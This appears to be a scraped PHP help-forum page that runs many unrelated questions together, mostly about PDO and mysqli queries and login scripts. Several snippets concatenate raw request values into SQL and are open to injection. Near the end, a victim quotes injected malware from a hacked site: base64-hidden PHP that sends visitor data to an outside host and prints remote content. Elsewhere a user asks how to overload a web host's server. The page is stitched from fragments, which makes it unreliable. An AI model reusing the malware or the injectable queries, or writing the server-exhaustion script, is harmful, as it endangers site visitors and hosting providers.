|
PHP - Strange Outcomes With $stmt->fetchcolumn()
Hi,
I have two scripts using almost identical code. Is this because PHP 7 needs to use only indexes in the WHERE part of SQL Query? Here are the two scripts - first one works
$sql = 'SELECT access,fname FROM clients WHERE email=?';
$stmt = $connect->prepare($sql);
$stmt->execute([$email]);
$data_exists = ($stmt->fetchColumn() > 0) ? true : false;
if ($data_exists) { // account found.
$row = $stmt->fetch();
$access = $row['access'];
$fname = $row['fname'];
}
else {
$err_msg = 'Invalid Email Address and/or Password.';
$email = '';
$pass = '';
require_once ("login_fm.php");
exit;
}
[/PHP]
$sql = 'SELECT email,fname,lname,confirm FROM clients WHERE user_key=?';
$stmt = $connect->prepare($sql);
$stmt->execute([$the_key]);
$data_exists = ($stmt->fetchColumn() > 0) ? true : false;
if ($data_exists) { // Account found.
$row = $stmt->fetch();
$email = $row['email'];
$name = $row['fname'].' '.$row['lname'];
$confirm = $row['confirm'];
$_SESSION['auth'] = "yes";
$_SESSION['email'] = $email;
$_SESSION['name'] = $name;
$sql = 'UPDATE clients SET confirm = ?,log_count = log_count+1,last_date=? WHERE email=?';
$stmt= $connect->prepare($sql);
$stmt->execute(['y',$today_time,$email]);
require_once("index.php"); // SUCCESSFUL LOGIN: THIS LOADS THE START PAGE
exit;
} // end if
else {
$err_page_message = "ERROR - Account not found $the_key : $name";
require_once("err.php");
exit;
} // end else
May be it's a different reason - like I'm too tied !
But it would be nice to know why it isn't working.
It's quite simple, I just want to check to see if a row exists with the condition given, that's all. I never had this problem the old mysql but the PDO seems a bit tricky or I'm just using the wrong code lol.
Thanks Edited June 15, 2019 by David-LondonSimilar TutorialsPhp Whizzs! Here is my login.php partial relevant to the case code:
$query_1 = "SELECT id,recruits_number,sponsor_username,account_activation_status,id_video_verification_status,id_verification_video_file_url,username,password,primary_domain,primary_website_email,registering_country,registering_ip,registering_browser,registering_os,registering_isp,age_range FROM users WHERE $querying_column = ?";
$stmt_1 = mysqli_prepare($conn,$query_1);
mysqli_stmt_bind_param($stmt_1,'s',$login_username_or_email_or_domain);
mysqli_stmt_execute($stmt_1);
//Check if User's details was successfully extracted or not from 'users' tbl.
if (!$stmt_1)
{
echo "ERROR 1: Sorry! Our system is currently experiencing a problem logging you in!";
exit();
}
else
{
$result_1 = mysqli_stmt_bind_result($stmt_1,$db_id,$db_recruits_number,$db_sponsor_username,$db_account_activation_status,$db_id_video_verification_status,$db_id_verification_video_file_url,$db_username,$db_password,$db_primary_domain,$db_website_email,$db_registering_country,$registering_ip,$registering_browser,$registering_os,$registering_isp,$db_age_range);
mysqli_stmt_fetch($stmt_1);
mysqli_stmt_close($stmt_1);
//Free Result_1 Set
mysqli_stmt_free_result($stmt_1);
I can login to user account with accurate password. Good! With wrong password, supposed to get error: "Incorrect log-in details". Instead get this:
"Warning: mysqli_stmt_free_result(): Couldn't fetch mysqli_stmt in C:\xampp\htdocs\test\login_v1.php on line 58 Line 58 is the last one: $result_1 = mysqli_stmt_bind_result($stmt_1,$db_id,$db_recruits_number,$db_sponsor_username,$db_account_activation_status,$db_id_video_verification_status,$db_id_verification_video_file_url,$db_username,$db_password,$db_primary_domain,$db_website_email,$db_registering_country,$registering_ip,$registering_browser,$registering_os,$registering_isp,$db_age_range); mysqli_stmt_fetch($stmt_1); mysqli_stmt_close($stmt_1); //Free Result_1 Set mysqli_stmt_free_result($stmt_1);
I read that you use "mysqli_stmt_free_result($stmt)" if you use mysqli_stmt_store_result($stmt). Is this causing the error ? Should I remove mysqli_stmt_free_result($stmt) ? Or, instead of this: mysqli_stmt_close($stmt_1); //Free Result_1 Set mysqli_stmt_free_result($stmt_1);
Should I do this: //Free Result_1 Set mysqli_stmt_free_result($stmt_1); mysqli_stmt_close($stmt_1);
Or, maybe I should add another line ? If so, then what and where ? Already checked the manual and stuck! How-about a sample code from your end ? Edited November 28, 2018 by phpsaneHello ,
I am trying to update a record in my table if the particular value exists in the rows of a table. But my if-else not working properly. I am not getting where i am going wrong.
here is my table authorization, where i define authorization % with min and max.
authorisation.JPG 16.83KB
0 downloads
after adding line items, before display i will check whether any one of the line item discount lies within this min and max and also checks whether authorization is required (required='Yes'/'No') for that discount in my authorization table. If authorization required then i will update that order number as authorized.
here is my line items table
line_items.JPG 20.37KB
0 downloads
I am doing like this
while($row=mysql_fetch_array($query))
{
$dis1 = "SELECT auth_id, auth_min, auth_max, required FROM sales_authorisation";
$dis2 = mysql_query($dis1) or die (mysql_error());
while($d1 = mysql_fetch_array($dis2))
{
$min = $d1['auth_min'];
$max = $d1['auth_max'];
$req = $d1['required'];
//echo $req;
if( ($min <= ($row['discount'])) && ($max >= ($row['discount'])) && ($req='Yes'))
{
$auth = "UPDATE orders SET authorise='No' WHERE order_id=".$order_id."";
echo "hello";
}
else
{
$auth = "UPDATE orders SET authorise='Yes' WHERE order_id=".$order_id."";
}
$auth1 = mysql_query($auth) or die (mysql_error());
}
?>
<tr>
<td><?php echo $counter++; ?></td>
<td><?php echo $row['itemname']; ?> - <?php echo $row['uom']; ?></td>
<td><?php echo $row['description']; ?></td>
<td><?php echo $row['quantity']; ?></td>
<td><?php echo number_format($row['selling_price'],2); ?></td>
<td><?php echo $row['discount']; ?> %</td>
<td><?php echo $row['tname']; ?>-<?php echo $row['rate']; ?> %</td>
<td><?php echo $row['freight']; ?></td>
<td><?php echo number_format($row['total'],2); ?></td>
</tr>
While loop is for displaying line items for the order.
But my if condition doesn't works . Not getting how to do it. please suggest
Code: [Select] $params = array(); $type=array(); $fragments = array(); while (list($chiave,$val) = each($_POST)){ if($val!=""){ $fragments[] = $chiave." = ?"; //echo $chiave; if($chiave=="ritiro" or $chiave=="data") $params[] = normalToDbDate($val); else $params[] = $val; if($chiave=="legale") $type[]='i'; else $type[]='s'; } } $prova=implode("",$type); foreach($params as $param) echo "<p>".$param."</p>"; //echo "val(".count($params).")-->".implode(',',$params); //echo "type(".strlen($prova).")-->".implode("",$type); $sql = $db->prepare("..... AND ".implode(" AND ", $fragments)); array_unshift($params,$prova) call_user_func_array( array( $sql, 'bind_param' ),$params); //$sql->bind_param($prova,$params); $sql->execute(); hi all, with the tructure above i've tried to implement the cration of a dynamic query for a search form. i debugged with echoes and che numbers of bind_param and the those in the prepared statement match in sense that count($params)=strlen($prova). having said that i get this error: Code: [Select] Warning: call_user_func_array() expects parameter 2 to be array, integer given in and no results are shown to me even when the filter match. Hi all !
I have a piece of code he
$result = display_all(fcon, $var1, $var2); function display_all( // defined in another file $query = "SELECT one, two, three four, index1, index2 FROM numbers WHERE index1 = $var1 LIMIT 0, 1"; $result = mysqli_query($fcon, $query); return ($result); )and then I use the returned variable $result to display the value as follows:-
while ($row = mysqli_fetch_array($result, MYSQLI_ASSOC))
{
echo "<tr>";
echo "<td>".$one."</td>";
echo "<td>".$two."</td>";
echo "<td>".$three. "</td>";
echo "<td>".$four. "</td>";
echo "<td>".$index1. "</td>";
echo "</tr>";
}
and this displays the n rows of data returned.
Now I have started using prepared statements and the function is now
function display_all{
$query = "SELECT one, two, three four, index1 FROM numbers WHERE index1 = ?
LIMIT 0, 10";
$stmt = $conn->prepare($query);
$stmt->bind_param('i',$var)
if($stmt->execute())
{
$stmt->bind_result($one, $two, $three, $four, $index1);
$stmt->store_result();
}
return($stmt);
}
However the returned $stmt object is unable to display the n rows of data since it shows null values. I assume that this is not the right way to use the $stmt object to display data. I must be missing something. So I request you guys to help me with this.
Thanks loads.
Edited by ajoo, 23 December 2014 - 11:24 AM. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <?php session_start(); ini_set('display_errors', 'On'); error_reporting(-1); //Connect to Database and Check cookies for logged in user $db = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS); mysql_select_db(MYSQL_DB_NAME); if (!isset($_GET['act'])) { if (!isset($_POST['act'])) { $act = 'idx'; } if (isset($_POST['act'])) { $act = mysql_real_escape_string($_POST['act']); } } if (isset($_GET['act'])) { $act = mysql_real_escape_string($_GET['act']); } If ($act == 'login' && $_GET['CODE']=='1') { $usernameUsed = mysql_real_escape_string($_POST['Username']); $passwordUsed = mysql_real_escape_string($_POST['Password']); $SaltPassword = MEMBER_PASS_SALT_1.$passwordUsed.MEMBER_PASS_SALT_2; $HashPassword = md5($SaltPassword); $QueryLogin = "SELECT * FROM ".MEMBER_LOGIN_TABLE." WHERE username='{$usernameUsed}' AND password='{$HashPassword}'"; $LoginResult = mysql_query($QueryLogin); if (mysql_num_rows($LoginResult) > 0) { $UserID = mysql_result($LoginResult, 0, 'user_id'); $Id = uniqid(); $IdQry = "UPDATE ".MEMBER_LOGIN_TABLE." SET `unique_id`='{$Id}' WHERE user_id='{$UserID}'"; $IdRes = mysql_query($IdQry, $db); setcookie('RAYTH_MEMBER_ID', $Id, time()+2592000); } } If ($act == 'logout' && $_GET['CODE'] == '1') { setcookie('RAYTH_MEMBER_ID', "", time()-3600); } if (isset($_COOKIE['RAYTH_SKIN'])) { $Skin = $_COOKIE['RAYTH_SKIN']; } Else { $Skin = 'redskin'; } if (isset($_COOKIE['RAYTH_MEMBER_ID'])) { $Id = mysql_real_escape_string($_COOKIE['RAYTH_MEMBER_ID']); $MemIdQry = "SELECT user_id FROM ".MEMBER_LOGIN_TABLE." WHERE `unique_id`='{$Id}'"; $memidres = mysql_query($MemIdQry, $db); $memidnum = mysql_num_rows($memidres); If ($memidnum < 1) { setcookie('RAYTH_MEMBER_ID', '', time()-3600); } Else { $memid = intval(mysql_result($memidres, 0, 'user_id')); } } if (isset($memid)) { $query_meminfo = "SELECT * FROM ".MEMBER_PROFILE_TABLE." WHERE `user_id`='{$memid}'"; $query_result = mysql_query($query_meminfo, $db); $MemName = mysql_result($query_result, 0, 'display_name'); $MemGroup = mysql_result($query_result, 0, 'Group'); $AdsEnabled = mysql_result($query_result, 0, 'ads_enabled'); $UserLevel = intval(mysql_result($query_result, 0, 'user_level')); $LevelQuery = "SELECT group_level FROM ".MEMBER_GROUPS." WHERE group_id='{$MemGroup}'"; $LevelResult = intval(mysql_result(mysql_query($LevelQuery, $db), 0, 'group_level')); If ($UserLevel < $LevelResult) { $MemLevel = $LevelResult; } Else { $MemLevel = $UserLevel; } } else { $MemLevel = 0; $AdsEnabled = 'yes'; } ?> <html> <HEAD> <title>Rayth.Info ..::Home::..</title> <?php $File = './skins/'.$Skin.'/'.$Skin.'.php'; If (file_exists($File)) { include("./skins/{$Skin}/{$Skin}.php"); } Else { include("../skins/{$Skin}/{$Skin}.php"); } ?> Ok this code is the Headers code which checks if user is logged in, what skin to load etc. It is also used in the forum (so used in home and forum) via php include. Now somethin strange happens. If I use the home page to login (Rayth.Info) it logs me in for both home page and forum (rayth.info/forum) Now, if I then logout, and goto the forum, relogin, it doesn't log me in on the home page. Both pages use the same login/logout/register forms by php include and the same headers.php by include so I cant see any reason why this is happening. The cookie is obviously being set when user logs in since it sees them logged in on one page. Ok, not sure what the problem is....hard to explain. I am trying to setup a login script but I get the normal: Warning: session_start() [function.session-start]: Cannot send session cache limiter error code. I have no white space above to cause problem. I have used this same code written by Jpmaster77 on a number of sites. What the strange thing is it also messed up a couple of my css text boxes. See the difference: http://www.monstersgonewild.ca/index.php - Problem http://www.monstersgonewild.ca/index1.php - Without session() I would post the code of the original page but it is 600+lines and growing. Anybody have any ideas? Hey guys, First of all thanks in advance for all the help you can give me. I'm using a php shopping script called plaincart to create a webstore. All is fine but the admin part is not working properly. When i go to http://localhost/admin it redirects to http://localhost/admin/admin/login.php The index.php is in the root of the server and the admin files are in a folder called admin... What is wrong? Please tell me if you need any code. Thank you HI every one I have uploaded a web site 2 month ago and It worked well . Since 1 week ago , it shows me this error and I don't know what is the problem . I have completely uploaded my web site again but it hasn't make different . This is the address birjand-niazmandi.com . I have uploaded class.phpmailer.php again but I can't understand what is the problem ? How can I solve it ? thanks I recently noticed some odd HTML appear in some of the websites I host. Not all of them are run on a CMS but the majority (but not all) are running through the same FTP account. I've searched everywhere for documentation, forums, notes on this particular exploit but haven't been able to find anything. Essentially, there is a small HTML snippet (see below) that appears right before the </html> tag. It's really odd and the characters inside the <b1> are all different strings. Here's the code that's appearing: Code: [Select] <b1><!--6FY8rhRLeNoNyVsOwiAQBdAdca0PXE5DYVKngSkZrsG4ej2/B80UJt+FlytuMcbnHbmqHEcoMnS3r9aaRshnw5QN+TT+F7NMUFqviTLgXCnuyei6vU3WY3lArcgn9Ff/AVyxJcZ=--></b1> It's evident that the code is some type of exploit but I'm not sure how deep this goes. Anyone heard of anything like this, or have any idea of what the potential issues that could occur? Thanks for your help! -suess0r i have a form here that redirect to : "proc/edit.php?edit=<?php echo urlencode($function_name);?>" Code: [Select] <?php require_once("includes/functions.php");?> <?php session_start(); if (isset($_SESSION["user_name"])) { require_once("includes/connection.php"); if(isset($_GET['functions'])){ $function_name=$_GET['functions']; $function_type=$_GET['type']; $query = "SELECT * FROM functions WHERE function_name = '{$function_name}' "; $result = mysql_query($query,$connection); if($result){ $row = mysql_fetch_array($result, MYSQL_ASSOC); $function_description=$row['function_description']; ?> <html> <head> <title>Edit Your function</title> </head> <body> <form name="edit_function_n" action="proc/edit.php?edit=<?php echo urlencode($function_name);?>" method="get"> Edit Your function name : <input type="text" name="new_function_name"/><br/><br/> Edit Your description here :<br/><br/> <textarea name="new_function_description" rows="10" cols="30"></textarea><br/><br/> <input type="submit" value="Change" /><br/><br/> </form> </body> </html> <?php } elseif(!$result){ redirect("errors/error_db.html");} } } else { redirect("main.php?error=log"); } //close connection! mysql_close($connection); ?> AND i have a proc php file that UPDATE the database with the new form variables and then redirect to show.php Code: [Select] <?php require_once("../includes/functions.php");?> <?php session_start(); if (isset($_SESSION["user_name"])) { require_once("../includes/connection.php"); //ignore this , this is for deleting! if(isset($_GET['delete'])){ //warning : using urldecode here is wrong cuz $_GET[var]; is already decoded! $function_to_delete=$_GET['delete']; $function_type=$_GET['functions']; $query="DELETE FROM functions WHERE function_name='{$function_to_delete}' "; $result = mysql_query($query, $connection); if(!$result){redirect("../errors/error_db.html");} elseif($result){ redirect("../show.php?functions={$function_type}&delete=suc"); }} //the place for edit ! elseif(isset($_GET['edit'])){ $old_function_name=$_GET['edit']; $new_function_name=$_POST['new_function_name']; $new_function_description=$_POST['new_function_description']; $query="UPDATE functions SET function_name='{$new_function_name}', function_description='{$new_function_description}' WHERE function_name='{$old_function_name}' "; $result = mysql_query($query, $connection); if(!$result){redirect("../errors/error_db.html");} elseif($result){redirect("../show.php?functions='{$function_type}'&edit=suc");} } } else { redirect("../main.php?error=log"); } ?> <?php //close connection! mysql_close($connection); ?> The problem is i get redirect to a strange link that never existed and i never pointed to : /proc/edit.php?new_function_name=($new_function_name)&new_function_description=($new_function_description) with the variables replaces with their values and with no database update whatsoever! I tried a lot with it with no result could someone help me out here! So i am currently coding database connection class and i have encountered very strange behavior from my script. base.class.php: Code: [Select] <?php class base{ private $settings; function get_settings(){ $settings["dbhost"] = 'localhost'; $settings["dbuser"] = '*****'; $settings["dbpass"] = '*****'; $settings["dbname"] = 'core'; return $settings; } } ?> database.class.php Code: [Select] <?php require_once 'base.class.php'; class database extends base{ private $query_now; private $link; public function __construct(){ $settings = base::get_settings(); $dbhost = $settings["dbhost"]; $dbuser = $settings["dbuser"]; $dbpass = $settings["dbpass"]; $dbname = $settings["dbname"]; $this->link = mysql_connect($dbhost, $dbname, $dbpass) or die ("Could not connect to the mysql database"); mysql_select_db($dbname, $this->link) or die ("Could not select the database"); } function query($query){ $this->query_now = $query; return mysql_query($query, $this->link); } function getArray($result){ return mysql_fetch_array($result); } } ?> When i try to create an instance of database class, i get mysql_connect error. I have tried to echo my array and it seems that correct information is being passed over. Now the strange thing is if i remove my password from the base class i don't get a mysql_connect error but this time instead i get "Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'core'@'localhost' (using password: YES) " In case you are wondering, does my mysql database user has a password, the answer is: yes for sure... (Also i have tried to setup a simple script for connecting to my database and everything worked fine) So any ideas? Im installing and testing a web application, and im having a strange bug that annoyes me because it dint have any sense and also it dont affects really to the web functionality: if($_POST["eliminar"]==""){ $consulta='SELECT * FROM impressora where Activa=0'; $result=mysql_query($consulta,$conexion); echo"<table align=CENTER class='sample'>"; echo"<p align=center>LLISTA D'IMPRESSORES INACTIVES.</p>"; printf("<th>MODEL</th><th>MARCA </th>"); while($fila=mysql_fetch_array($result,MYSQL_ASSOC)){ echo"<tr>"; echo "<td>" . $fila["Model"] . "</td>"; echo "<td>" . $fila["Marca"] . "</td>"; echo"</td>"; if($_SESSION["admin"]!=0){ ?> <form method= "post" ACTION="impressores_inactives.php?idr=<?php echo($fila["Id_impressora"])?>"> <td colspan="2"><INPUT TYPE ="SUBMIT" NAME="eliminar" VALUE="Eliminar"></td> </form></td> <?php } echo "</tr>"; } echo"</table>"; }else{ echo 'eliminado'; echo $_POST["eliminar"]; //BORRAMOS DE LA BBDD LA IMPRESSORA $consulta="delete from impressora where Id_impressora='".$_GET["idr"] ."'"; $result=mysql_query($consulta); echo "<meta http-equiv=Refresh content=\" ; url=../Impressores/impressores_inactives.php\">"; } The problem is that php say that eliminar is undefinded, and if i test $_POST it says its empty. See that eliminar is the name of the submit post and its checked for a function that deletes a item. The problem is that script is actually working. I can delete the printer but with that error... and if i test the value of eliminar is always empty. Ask for any other explanation without a problem , the code is in spanish. I'm returning a table row that contains information about a file, but it seems in IE versions older than 10, it is cutting off some of the returned json when being used.
The data is being returned properly as seen in the following json:
{"file_name":"<i class='video'><\/i> <a href=\"\/Development\/test(4).mp4\" class=\"is_file\" target=\"_blank\">test(4).mp4<\/a>"}
But when you use it, it cuts off the html. A simple alert will return
</i> test(4).mp4</a>and same when appending it and the sort. It is also happening for another part of HTML that is being returned properly in the json. It is working for everything else that is returned. I have been searching around for a very long time trying to find why this is happening. Has anyone other than me encountered this? So I have a client that wants me to add a function to her site that when she clicks a mailto href on a page to spawn an email child, some canned data chunk gets inserted into a form's textarea field.. something like: "Email sent to blah@blah.com on 8/14/14".
I'm drawing a blank on how this might be handled.. any ideas out there??
Hi all! Firstly, I'd like to say a big hello to everyone Right, so I have a bit of a strange problem. I get no error, but my page stalls. So here's what I've got, a simple alphabet (A-Z) in capitals at the top of the page, created by: $alphabet = array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'); // then further down the page I have it looped as so: <?php foreach($alphabet as $link): ?> <a href="suppliers.php?filter=<?php echo $link; ?>"> <?php echo $link; ?> </a> | <?php endforeach; ?> So that's all cool. I then have this at the top of the page: $the_suppliers = (isset($_GET['filter']) && preg_match("/[^A-Z]*/",$_GET['filter'])) ? $suppliers -> get_all($_GET['filter']) : $suppliers -> get_all('all'); Now I have preg_match() in there as I was using ctype_alpha() to check for only alphabetical chars, and thought that might be my problem, but still get it with preg_match(); Anyway, my class method (get_all()) is: public function get_all($filter){ global $database; if($filter == 'all'){ $sql = "SELECT * FROM " . self::$table . " WHERE on_web = 1 ORDER BY RAND() LIMIT 10"; }else{ $sql = "SELECT * FROM " . self::$table . " WHERE on_web = 1 AND LEFT(name,1) = '" . $database -> sql_prep($filter) . "'"; } return self::find_by_sql($sql); } Now this works fine for b-z, but for some reason when the filter=A it just hangs..... I have ran the sql in phpmyamin and it returns the result straight away, so I know it's not the sql. Does anyone here know where I might be going wrong here? It's very odd and I've never come across this before, and not getting an error doesn't really help much. Any suggestions or pointers will be gratefuly received Hi, long story short a webhost has renewed my hosting for 12 months even though my auto renewal was OFF and I did not authorise a renewal, despite the fact I had not even used the hosting for ~8 months, so clearly I was not interested in renewing.. but they are money grabbing and are ignoring my emails and just copy and paste their "cancellation policy" which is ridiculous.
So seeing as they aren't cancelling my account, I want to make a PHP script to fully maximize the server resources. An infinite loop of whatever uses the most memory/cpu/network so they will CANCEL my account. Can anyone help? What is the best way to waste/maximize/slow down a web server? I would appreciate any help.
Thanks! Quote
Unknown column 'Carmel' in 'where clause'
Passing variable via the URL: https://www.courtsideindiana.com/season-preview/19-20/sectional1920/?sectional=8&school=Carmel Sectional = 8 School = Carmel Before I added the &school=Carmel, it was working, just echoing the total list of schools in the table.
$sectional = $_GET['sectional'];
$school = $_GET['school'];
echo $school;
// Query
$query = "SELECT * FROM a_schools WHERE sectional=".$sectional." AND school=" . $school ."";
$results = mysqli_query($con,$query);
echo mysqli_error($con);
while($row = mysqli_fetch_assoc($results)) {
echo $row['school'] . '<br>';
}
I have the most simple loop ever on this earth an its doin strange things. There are 6 rows in my cache table. I have a query to echo the rows onto the page with a loop. Now Im try to limit the rows returned to 1 row. simples eh. $FetchCacheq = mysql_query("SELECT * FROM cacheInfo LIMIT 1") or die('cache error'); <table width="480" border="0" cellpadding="0" cellspacing="5"> <tr> <td colspan="2" valign="baseline"><strong>Caches you have found</strong></td> </tr> <?php do { ?> <tr> <td width="250" height="31" align="left" valign="middle"><?php echo $row['cacheName'];?></td> <td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td> </tr> <?php } while($row = mysql_fetch_assoc($FetchCacheq));?> </table> The problem I have is its showing two rows. Here is the source code from the page <table width="480" border="0" cellpadding="0" cellspacing="5"> <tr> <td colspan="2" valign="baseline"><strong>Caches you have found</strong></td> </tr> <tr> <td width="250" height="31" align="left" valign="middle"></td> <td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td> </tr> <tr> <td width="250" height="31" align="left" valign="middle">Your Life in Their Hands</td> <td width="230" align="left" valign="middle"><img src="/images/submit.png" width="20" height="20" /></td> </tr> </table> as you can see one of the rows doesnt even have the cache name in it!!! please help im really confused. The code below was inserted into every single index.php on one of my clients sites. It went through and every single index.php page (in each folder) had that following code put in. It was strange. As far as I can tell there are no FTP logs, besides my own IP. This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a full security audit yet. What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <? is inserted right after it. I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange. Any advice on how this is generally done, and anyone with similar issues? Code: [Select] <? require_once('security.inc.php'); ?><? if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> |
|||||||